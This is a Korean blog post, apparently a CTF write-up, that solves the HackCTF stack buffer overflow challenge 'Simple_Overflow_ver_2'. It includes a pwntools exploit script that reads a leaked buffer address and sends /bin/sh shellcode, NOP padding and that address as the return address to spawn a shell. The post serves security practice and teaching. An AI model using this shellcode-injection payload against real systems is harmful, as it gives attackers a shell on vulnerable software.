ii4gsp

HackCTF - Simple_Overflow_ver_2 본문

시스템 해킹/HackCTF

HackCTF - Simple_Overflow_ver_2

ii4gsp 2020. 2. 9. 15:10

파일을 다운받아 주자.

 

 

 

 

IDA로 열어보면 Data를 입력받고 입력받은곳의 주소를 출력해준다.

y나 Y를 입력하면 무한루프를 돌 수 있다.

s ~ sfp는 140이다.

s에 쉘 코드를 넣고 ret를 s의 주소로 해주면 된다.

 

 

 

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3006)

shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'

r.recvuntil('Data : ')
r.sendline('asd')

buffer = int(r.recv(10), 16)

r.recvuntil('Again (y/n): ')
r.sendline('y')

payload = ''
payload += shellcode
payload += '\x90' * 115
payload += p32(buffer)

r.recvuntil('Data : ')
r.sendline(payload)

r.interactive()

소스코드를 작성해주자.

 

 

 

 

'시스템 해킹 > HackCTF' 카테고리의 다른 글

HackCTF - BOF_PIE  (0) 2020.02.09
HackCTF - Offset  (0) 2020.02.09
HackCTF - x64 Simple_size_BOF  (0) 2020.02.09
HackCTF - x64 Buffer Overflow  (0) 2020.02.09
HackCTF - 내 버퍼가 흘러넘친다!!!  (0) 2020.02.09
Comments